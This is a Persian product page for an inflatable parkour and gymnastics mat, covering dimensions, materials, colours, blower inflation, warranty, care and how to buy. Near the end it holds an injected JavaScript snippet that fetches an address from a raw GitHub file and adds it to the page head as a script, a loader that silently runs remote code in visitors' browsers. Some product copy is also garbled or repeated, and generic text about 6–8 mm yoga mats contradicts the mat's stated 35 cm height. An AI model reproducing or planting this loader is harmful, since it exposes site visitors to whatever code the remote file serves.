تشک پارکور ( ژیمناستیک )

  • تشک پارکور – تشک های ورزشی بادی نوعی تشک هستند که با باد کردن پر می شوند و برای انجام ورزش های مختلف مانند یوگا، تناسب اندام، کشش و … مناسب هستند. این تشک ها مزایایی مانند سبک بودن، قابلیت حمل آسان، راحتی و انعطاف پذیری دارند.

    اندازه و ضخامت تشک: بسته به نوع ورزشی که می خواهید انجام دهید، باید تشکی را انتخاب کنید که طول و عرض کافی داشته باشد تا بدن شما را جا دهد. همچنین ضخامت تشک باید به گونه ای باشد که روی زمین فشار نیاید و از آسیب دیدن مفاصل و استخوان های شما جلوگیری کند. معمولاً تشک های بادی با ضخامت 6 تا 8 میلی متر مناسب هستند
    جنس و کیفیت تشک: باید تشکی را انتخاب کنید که جنس بدنه و رویه آن مرغوب و مقاوم باشد. جنس بدنه تشک باید از PVC فشرده یا برزنت باشد که ضد آب و ضد سایش باشد. جنس رویه تشک باید از مخمل ضد تعریق باشد که لغزنده نباشد و راحتی را افزایش دهد. همچنین باید تشکی را انتخاب کنید که دارای درپوش و ولو برای باد کردن و وکیوم کردن باشد.
    نحوه نصب و نگهداری تشک: باید تشکی را انتخاب کنید که نصب و جمع کردن آن آسان باشد. برای باد کردن تشک می توانید از پمپ باد دستی یا برقی استفاده کنید. برای جمع کردن تشک باید از ولو استفاده کنید تا هوای داخل آن خارج شود. برای نگهداری تشک باید آن را در محلی تمیز و خشک قرار دهید و از تماس آن با شی تیز یا داغ جلوگیری کنید. در صورت پنچری یا خرابی تشک می توانید از مجموعه تعمیراتی استفاده

     

    جنس تشک پارکور از بالاترین کیفیت پارچه دو لایه کره ای بوده و پس از اطمینان از کیفیت بالا تولید تشک انجام می گردد. اتصال پارچه تشک به صورت پرس با دستگاه قالب می باشد. همچنین بسته به سفارش و نیاز شما دارای تعدادی کانال بلیزر می باشد.

    طرح این تشک ورزشی به صورت ثابت بوده و قابلیت تغییر نیست! اما در صورت نیاز می توان رنگ آن را به رنگ های قرمز ،زرد، سرمه ای، آبی روشن و نارنجی بسته به سفارش مشتری و موجودی تغییر داد.

    ابعاد تشک ورزشی با عرض 2.20 متر و ارتفاع 35 سانتی متر ثابت می باشد. اما طول این محصول بسته به نیاز شما به صورت سفارشی انجام می گردد. همچنین تعدادی کانال بلیزر بسته به طول شما درون تشک ورزشی قرار می گیرد. تشک پارکور  تولید بادی سازان مجد به لوازم خاصی نیاز ندارد. تنها جهت پر کردن باد آن می توانید از بلوور استفاده نمایید. بسته به طول و حجم تشک ورزشی شما بلوور پیشنهادی متفاوت است که می توانید با تماس با پشتیبانی اطلاعات کافی را دریافت نمایید. ضمانت و خدمات – این محصول دارای 6 ماه ضمانت و خدمات پس از فروش مادام العمر می باشد. نحوه نگهداری از تشک پارکوراین – تشک مخصوص سالن های ورزشی و باشگاه ها ساخته شده. بنابرین آفتاب و آب و هوای نا مسائد مانند رطوبت و باران به آن آسیب میرساند. همچنین بهتر است از برخورد وسایل تیز و سطح نا هموار جلوگیری شود

    این تشک در کمپ های تفری هم استفاده می شود این تشک بادی دارای یک ساختار مواج استبادی دارای یک ساختار مواج است که باعث ایجاد یک سطح نرم و متناسب با بدن می شود. این تشک بادی با یک پمپ باد دستی یا برقی باد می شود و دارای یک کیف حمل کوچک است. این تشک بادی دارای یک سطح ضد آب و ضد سایش

    بلوور آپ استریت 800 وات Km-130-u800 - 1
    بلور مخصوص تشک های پارکور

    نحوه خرید این تشک پارکور ( ژیمناستیک )

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید تشک پارکور ( ژیمناستیک ) به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید